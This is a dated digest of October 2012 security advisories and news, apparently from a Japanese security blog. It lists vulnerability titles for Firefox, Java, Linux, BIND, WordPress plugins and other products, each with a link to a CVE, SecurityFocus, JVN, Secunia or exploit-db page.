Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3960 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55325

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3963 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55340

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3964 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55322

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3967 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55277

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-1970 Multiple Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55266

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1974 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55317

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1975 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55318

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1972 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55314

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3959 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55324

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3958 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55323

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3966 Multiple Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/55274

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-1976 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55319

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3978 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55306

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3957 Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55341

Mozilla Firefox/SeaMonkey CVE-2012-3976 Address Bar Spoofing Vulnerability
http://www.securityfocus.com/bid/55313

Mozilla Firefox/Thunderbird Web Console CVE-2012-3980 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55257

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3956 Use-After-Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55320

Linux Kernel dl2k Network Driver IOCTL Handling Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53965

python 'distutils' Component '~/.pypirc' File Local Race Condition Vulnerability
http://www.securityfocus.com/bid/52732

Python SimpleXMLRPCServer Denial Of Service Vulnerability
http://www.securityfocus.com/bid/51996

Python Hash Collision Denial Of Service Vulnerability
http://www.securityfocus.com/bid/51239

Python 'audioop' Module Memory Corruption Vulnerability
http://www.securityfocus.com/bid/40863

Python 'PySys_SetArgv' Remote Command Execution Vulnerability
http://www.securityfocus.com/bid/40862

Python 'audioop' Module Integer Overflow Vulnerability
http://www.securityfocus.com/bid/40370

Fedora 'Dracut' Package Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55713

Microsoft Internet Explorer Image Arrays Use-After-Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55562

Multiple HP Products CVE-2012-3268 Multiple Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56183

Linux Kernel CVE-2011-4110 NULL Pointer Dereference Denial of Service Vulnerability
http://www.securityfocus.com/bid/50755

Linux Kernel 'ib_uverbs_poll_cq()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/46488

Microsoft Internet Explorer OnMove Use-After-Free Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/55641

Eduserv OpenAthens SP for Java CVE-2012-5353 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55899

ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55522

RETIRED: Adobe Flash Player and AIR APSB12-22 Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/55827

RETIRED: Adobe Flash Player and AIR APSB12-19 Multiple Remote Vulnerabilities
http://www.securityfocus.com/bid/55136

RETIRED: Adobe Shockwave Player APSB12-23 Multiple Code Execution Vulnerabilities
http://www.securityfocus.com/bid/56181

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
http://www.securityfocus.com/bid/54658

ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/53772

7-Zip Unspecified Archive Handling Vulnerability
http://www.securityfocus.com/bid/28285

Linux Kernel IPv6 'nf_ct_frag6_reasm()' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/54367

Linux Kernel 'sock_alloc_send_pskb()' Function Heap Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/53721

Linux Kernel iptables '--syn' Rules Security Bypass Vulnerability
http://www.securityfocus.com/bid/53733

Linux Kernel 'taskstats' Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/55144

Icecast 'error.log' Security Bypass Vulnerability
http://www.securityfocus.com/bid/56176

OpenStack Dashboard (Horizon) CVE-2012-3540 Redirect Module Open Redirection Vulnerability
http://www.securityfocus.com/bid/55329

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Tinyproxy Header Multiple Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/55099

ViewVC CVE-2012-4533 HTML Injection Vulnerability
http://www.securityfocus.com/bid/56161

ViewVC 'svn_ra.py' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54199

ViewVC 'svn_ra.py' Authorization Security Bypass Vulnerability
http://www.securityfocus.com/bid/54197

ViewVC 'cvsdb.py' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/47928

cups-pk-helper 'cupsGetFile()' and 'cupsPutFile()' Local Security Vulnerabilities
http://www.securityfocus.com/bid/55911

Drupal MailChimp Module Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/56234

Drupal Time Spent Module Multiple Unspecified Input Validation Vulnerabilities
http://www.securityfocus.com/bid/56233

VAM Shop Multiple Cross Site Scripting and SQL Injection Vulnerabilities
http://www.securityfocus.com/bid/56232

Winmail Server Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56231

WordPress Spider Calendar Plugin 'many_sp_calendar' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56228

DomainKeys Identified Mail (DKIM) Multiple Security Vulnerabilities
http://www.securityfocus.com/bid/56227

Liferay Portal Security Bypass and HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56226

Grandstream GXP1405 Multiple HTML Injection Vulnerabilities
http://www.securityfocus.com/bid/56186

24日 水曜日、赤口

+ APSB12-23: Security update available for Adobe Shockwave Player
http://www.adobe.com/support/security/bulletins/apsb12-23.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4173
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4174
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4175
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5273
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4176

+ PDFCreater 1.5.1 released
http://download.pdfforge.org/download/pdfcreator/PDFCreator-stable

+ Wireshark is 1.8.3 released
http://www.wireshark.org/docs/relnotes/wireshark-1.8.3.html

+ Microsoft Security Advisory (2755801) Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10
http://technet.microsoft.com/en-us/security/advisory/2755801

+ JVN#42676559 Safari においてリモートからローカルファイルを読み取り可能な脆弱性
http://jvn.jp/jp/JVN42676559/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3713

+ SA51081 HP Multiple Products Unspecified Information Disclosure Vulnerabilities
http://secunia.com/advisories/51081/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268

キングソフト、「遠隔操作型への4重防御」機構を備えたWindows 8対応ウイルス対策ソフト新版
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/432012/?ST=security

WebブラウザーSafariに深刻な脆弱性、JVNは「Windows版の使用停止」を推奨
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/432003/?ST=security

NEC、ソフトトークンによる端末認証サービス「NEC Cloud Authentication」を開始
http://itpro.nikkeibp.co.jp/article/NEWS/20121023/431902/?ST=security

JVNVU#841851 Mutiny にコマンドインジェクションの脆弱性
http://jvn.jp/cert/JVNVU841851/

JVNDB-2012-005004 (JVNVU#603276) OTRS にクロスサイトスクリプティングの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005004.html

JVNDB-2012-004939 (JVNVU#332412) ZENworks Asset Management に情報漏えいの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004939.html

JVNDB-2012-004958 Oracle Java SE の Java Runtime Environment における Deployment の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004958.html

JVNDB-2012-004451 libdbus における権限を取得される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004451.html

JVNDB-2012-004379 ISC DHCP におけるサービス運用妨害 (デーモンクラッシュ) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004379.html

JVNDB-2012-004457 International Color Consortium Format library における整数アンダーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004457.html

JVNDB-2012-000088 (JVN#42676559) (JVNVU#503755) Safari においてリモートからローカルファイルを読み取り可能な脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-000088.html

JVNDB-2012-005083 (JVNVU#841851) Mutiny にコマンドインジェクションの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005083.html

JVNDB-2012-005082 IBM XIV Storage System Gen3 におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005082.html

JVNDB-2012-005080 IBM DB2 におけるスタックベースのバッファオーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005080.html

JVNDB-2012-005079 Windows 上で稼働する CA ARCserve Backup におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005079.html

JVNDB-2012-005078 Windows 上で稼働する CA ARCserve Backup のサーバにおける任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-005078.html

JVNDB-2012-003475 MIT Kerberos の KDC におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003475.html

JVNDB-2012-003474 MIT Kerberos の KDC におけるサービス運用妨害 (DoS) の脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003474.html

JVNDB-2012-003918 Oracle Java 7 に脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003918.html

JVNDB-2012-004019 Oracle Java SE の Java Runtime Environment (JRE) における Beans の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-004019.html

JVNDB-2012-002755 Oracle Java SE の Java Runtime Environment (JRE) におけるライブラリの処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002755.html

JVNDB-2012-002754 Oracle Java SE の Java Runtime Environment (JRE) における Hotspot の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002754.html

JVNDB-2012-002751 Oracle Java SE の Java Runtime Environment (JRE) における Deployment の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002751.html

JVNDB-2012-002750 Oracle Java SE の Java Runtime Environment (JRE) における Deployment の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002750.html

JVNDB-2012-002748 Oracle Java SE の Java Runtime Environment (JRE) における CORBA の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002748.html

JVNDB-2012-002747 Oracle Java SE の Java Runtime Environment (JRE) における Security の処理に関する脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-002747.html

Cyber Security Awareness Month - Day 23: Character Encoding Standards - ASCII and Successors
http://isc.sans.edu/diary.html?storyid=14362

VU#160027 Broadcom BCM4325 and BCM4329 wireless chipset denial-of-service vulnerability
http://www.kb.cert.org/vuls/id/160027

VU#872545 Adobe Shockwave 11.6.7.637 contains multiple exploitable vulnerabilities
http://www.kb.cert.org/vuls/id/872545

Adobe Shockwave Player Buffer Overflows and Array Error Lets Remote Users Execute Arbitrary Code
http://www.securitytracker.com/id/1027692

HP/H3C and Huawei SNMP Weak Access to Critical Data
http://cxsecurity.com/issue/WLB-2012100207

Linksys WRT54GX (ADSL Router) Cross Site Request Forgery
http://cxsecurity.com/issue/WLB-2012100206

Apple QuickTime 7.7.2(1680.56) Division By Zero
http://cxsecurity.com/issue/WLB-2012100205

phpMyFAQ <= 2.6.8 XSS
http://cxsecurity.com/issue/WLB-2012100204

HP Intelligent Management Center UAM sprintf Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080293

HP OO RSScheduler Service JDBC Connector Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080295

HP SiteScope SOAP Call getSiteScopeConfiguration Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080288

HP SiteScope UploadFilesHandler Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080288

HP SiteScope SOAP Call getFileInternal Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080289

HP SiteScope SOAP Call create Remote Code Execution
http://cxsecurity.com/issue/WLB-2012080290

Adobe Flash Player "Matrix3D" Integer Overflow Code Execution
http://cxsecurity.com/issue/WLB-2012090118

phpMyAdmin 3.5.2.2 server_sync.php backdoor
http://cxsecurity.com/issue/WLB-2012090231

IBM Lotus Notes Traveler 8.5.3 XSS & CSRF & Brute Force
http://cxsecurity.com/issue/WLB-2012100020

OTRS 3.1 Stored XSS Vulnerability
http://cxsecurity.com/issue/WLB-2012100157

HP Multiple Products Unspecified Information Disclosure Vulnerabilities
http://secunia.com/advisories/51081/

ViewVC Diff View Script Insertion Vulnerability
http://secunia.com/advisories/51041/

Bitrix Site Manager JW Player Cross-Site Scripting Vulnerability
http://secunia.com/advisories/51021/

WordPress UnGallery Plugin "search" Arbitrary Command Execution Vulnerability
http://secunia.com/advisories/50875/

ManageEngine Security Manager Plus File Disclosure and SQL Injection Vulnerabilities
http://secunia.com/advisories/51069/

WordPress Zingiri Form Builder Plugin "error" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50983/

WordPress Thank You Counter Button Plugin "paged" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50977/

WordPress Zingiri Bookings Plugin "error" Cross-Site Scripting Vulnerability
http://secunia.com/advisories/50975/

F5 FirePass SQL Injection and Redirection Vulnerabilities
http://secunia.com/advisories/51045/

Dolibarr ERP/CRM Two Cross-Site Scripting Vulnerabilities
http://secunia.com/advisories/51058/

Magento Unirgy uStoreLocator Extension SQL Injection Vulnerability
http://secunia.com/advisories/50917/

Avaya Aura Presence Services Linux Kernel Multiple Vulnerabilities
http://secunia.com/advisories/51077/

Apache OFBiz Unspecified Vulnerability
http://secunia.com/advisories/51052/

Palo Alto Networks GlobalProtect Certificate Verification Security Issue
http://secunia.com/advisories/51036/

REMOTE: Turbo FTP Server 1.30.823 PORT Overflow
http://www.exploit-db.com/exploits/22161

DoS/PoC: Adobe Reader 10.1.4 Crash PoC
http://www.exploit-db.com/exploits/22155

DoS/PoC: RealPlayer 15.0.6.14 .3gp Crash PoC
http://www.exploit-db.com/exploits/22154

Korenix Jetport 5600 Series Default Credentials Authentication Bypass Vulnerability
http://www.securityfocus.com/bid/55196

Linux Kernel 'mmap()' Failure Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53668

Linux Kernel 'inet->opt ip_options' Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/55359

Linux Kernel 'rds_recvmsg()' Function Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54702

Linux Kernel dl2k Network Driver IOCTL Handling Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/53965

Linux Kernel 'i915_gem_execbuffer.c' Multiple Integer Overflow Vulnerabilities
http://www.securityfocus.com/bid/53971

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4179 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56129

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3990 Use After Free Memory Corruption Vulnerability
http://www.securityfocus.com/bid/56131

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4186 Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56135

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4180 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56126

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-4188 Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/56123

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3991 Security Bypass Vulnerability
http://www.securityfocus.com/bid/55930

Mozilla Firefox/Thunderbird/Seamonkey CVE-2012-3982 Memory Corruption Vulnerability
http://www.securityfocus.com/bid/55924

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-4182 Remote Code Execution Vulnerability
http://www.securityfocus.com/bid/56121

Mozilla Firefox/Thunderbird/SeaMonkey CVE-2012-3986 Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55922

Oracle Java SE CVE-2012-5081 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56071

ViewVC 'cvsdb.py' Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/47928

ViewVC 'svn_ra.py' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/54199

ViewVC CVE-2012-4533 HTML Injection Vulnerability
http://www.securityfocus.com/bid/56161

ViewVC 'svn_ra.py' Authorization Security Bypass Vulnerability
http://www.securityfocus.com/bid/54197

Adobe Shockwave Player APSB12-23 Multiple Code Execution Vulnerabilities
http://www.securityfocus.com/bid/56181

Oracle Java SE CVE-2012-5088 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56057

Oracle Java SE CVE-2012-5071 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56061

Oracle Java SE CVE-2012-5089 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56059

Oracle Java SE CVE-2012-5087 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56043

Oracle Java SE CVE-2012-5084 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56063

Oracle Java SE CVE-2012-5077 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56058

Oracle Java SE CVE-2012-5079 Remote Security Bypass Vulnerability
http://www.securityfocus.com/bid/56082

Oracle Java SE CVE-2012-5085 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56067

Oracle Java SE CVE-2012-5086 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56039

Oracle Java SE CVE-2012-5083 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56025

Oracle Java SE CVE-2012-5076 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56054

Oracle Java SE CVE-2012-5073 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56080

Oracle Java SE CVE-2012-5075 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56081

Oracle Java SE CVE-2012-5074 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56056

Oracle Java SE CVE-2012-5070 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56079

Oracle Java SE CVE-2012-5072 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56083

Oracle Java SE CVE-2012-5069 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56065

Oracle Java SE CVE-2012-5068 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56076

Oracle Java Virtual Machine (JVM) CVE-2012-4416 Remote Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55501

Oracle Java SE CVE-2012-3216 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56075

Oracle Java SE CVE-2012-5067 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56070

Oracle Java SE CVE-2012-1531 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56033

Oracle Java SE CVE-2012-3143 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56055

Oracle Java SE CVE-2012-3159 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56072

Oracle Java SE CVE-2012-1532 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56051

Oracle Java SE CVE-2012-1533 Remote Java Runtime Environment Vulnerability
http://www.securityfocus.com/bid/56046

ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
http://www.securityfocus.com/bid/55852

cups-pk-helper 'cupsGetFile()' and 'cupsPutFile()' Local Security Vulnerabilities
http://www.securityfocus.com/bid/55911

Tinyproxy Header Multiple Denial of Service Vulnerabilities
http://www.securityfocus.com/bid/55099

Oracle April 2007 Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/23532

Oracle January 2007 Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/22083

Oracle October Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/15134

Oracle January 2008 Critical Patch Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/27229

BreakPoint Software Hex Workshop '.hex' File Handling Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/33932

Ots Labs OtsTurntables M3U Local Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/25514

Oracle January Security Update Multiple Vulnerabilities
http://www.securityfocus.com/bid/16287

Sun Solaris 'CODE_GET_VERSION IOCTL' Local Denial Of Service Vulnerability
http://www.securityfocus.com/bid/38016

FirePass SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability
http://www.securityfocus.com/bid/56156

Cerulean Studios Trillian Multiple Remote Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/29330

ManageEngine Security Manager Plus Advanced Search SQL Injection Vulnerability
http://www.securityfocus.com/bid/56138

Linux Kernel Unix Sockets Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/45037

Linux Kernel Unix Socket Backlog Local Denial of Service Vulnerability
http://www.securityfocus.com/bid/46637

Linux Kernel 'ethtool.c' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/45972

Drupal Arbitrary PHP Code Execution and Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56103

Django 'HttpRequest.get_host()' Information Disclosure Vulnerability
http://www.securityfocus.com/bid/56146

FreeRADIUS Multiple Stack Based Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/55483

JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/55199

JW Player 'playerready' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/54739

JW Player Multiple Cross Site Scripting Vulnerabilities
http://www.securityfocus.com/bid/48214

JW Player HTML Injection And Content Spoofing Vulnerability
http://www.securityfocus.com/bid/53876

Ruby CVE-2012-4522 Local File Creation Vulnerability
http://www.securityfocus.com/bid/56115

Ruby '#to_s' Method Incomplete Fix Security Bypass Vulnerability
http://www.securityfocus.com/bid/55813

Ruby 'error.c' Multiple Security Bypass Vulnerabilities
http://www.securityfocus.com/bid/55757

GNU glibc Multiple Local Stack Buffer Overflow Vulnerabilities
http://www.securityfocus.com/bid/54982

Real Networks RealPlayer Write Access Violation Arbitrary Code Execution Vulnerability
http://www.securityfocus.com/bid/56113

OpenJPEG Heap Based Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/55214

HAProxy Trash Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/53647

Broadcom BCM4325 and BCM4329 Wireless Chipset Out of Bound Read Denial of Service Vulnerability
http://www.securityfocus.com/bid/56184

Multiple HP Products CVE-2012-3268 Multiple Information Disclosure Vulnerabilities
http://www.securityfocus.com/bid/56183

WordPress UnGallery Plugin 'search' Parameter Remote Arbitrary Command Execution Vulnerability
http://www.securityfocus.com/bid/56182

WordPress Thank You Counter Button Plugin 'paged' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56180

WordPress Zingiri Form Builder Plugin Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56179

WordPress Bookings Plugin 'error' Parameter Cross Site Scripting Vulnerability
http://www.securityfocus.com/bid/56177

F5 FirePass Remote SQL Injection Vulnerability
http://www.securityfocus.com/bid/56175

Joomla! 'com_sqlreport' Component Password Disclosure Vulnerability
http://www.securityfocus.com/bid/56172

23日 火曜日、大安

+ HPSBHF02819 SSRT100920 rev.1 - HP, 3COM, and H3C Routers & Switches, Remote Disclosure of Information
https://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%25253Demr_na-c03515685%25257CdocLocale%25253Dja_JP&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3268

+ Check Point response to CVE-2012-4930 aka CRIME attack
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk86443&src=securityAlerts
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4930

+ Linux kernel 3.0.48 released
http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.0.48

+ Linux Kernel 'binfmt_script.c' Local Information Disclosure Vulnerability
http://www.securityfocus.com/bid/55878

Aqua Data Studio 12.0 - Big Data Performance & ETL Shell for PostgreSQL
http://www.postgresql.org/about/news/1421/

pgBadger 2.1 released
http://www.postgresql.org/about/news/1419/

Announcing Barman 1.1
http://www.postgresql.org/about/news/1418/

ソフトウェア等の脆弱性関連情報に関する届出状況
[2012年第3四半期（7月～9月）]
http://www.ipa.go.jp/security/vuln/report/vuln2012q3.html

チェックしておきたい脆弱性情報＜2012.10.23＞
http://itpro.nikkeibp.co.jp/article/COLUMN/20121021/431301/?ST=security

「遠隔操作ウイルス」はありふれたウイルス――その正体を探る
「パソコンを乗っ取るウイルスは珍しくない」「感染の危険性は小さい」
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431561/?ST=security

ネットオフで1万件超の情報漏洩の可能性、サービス提供を一時停止中
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431552/?ST=security

Microsoft、封鎖に追い込んだKelihosボットネットに関する訴訟で和解
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431502/?ST=security

ソフトイーサ、遠隔操作ウイルスによる冤罪防止ソフトを無償配布開始
http://itpro.nikkeibp.co.jp/article/NEWS/20121022/431441/?ST=security

JVNDB-2012-003925 Apache QPID における認証を回避される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003925.html

JVNDB-2012-003798 Adobe Flash Player におけるコンテンツを読まれる脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003798.html

JVNDB-2012-003797 Adobe Flash Player における整数オーバーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003797.html

JVNDB-2012-003796 Adobe Flash Player における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003796.html

JVNDB-2012-003795 Adobe Flash Player における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003795.html

JVNDB-2012-003794 Adobe Flash Player における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003794.html

JVNDB-2012-003793 Adobe Flash Player における任意のコードを実行される脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003793.html

JVNDB-2012-003098 libexif の exif-entry.c の exif_entry_get_value 関数における整数アンダーフローの脆弱性
http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-003098.html

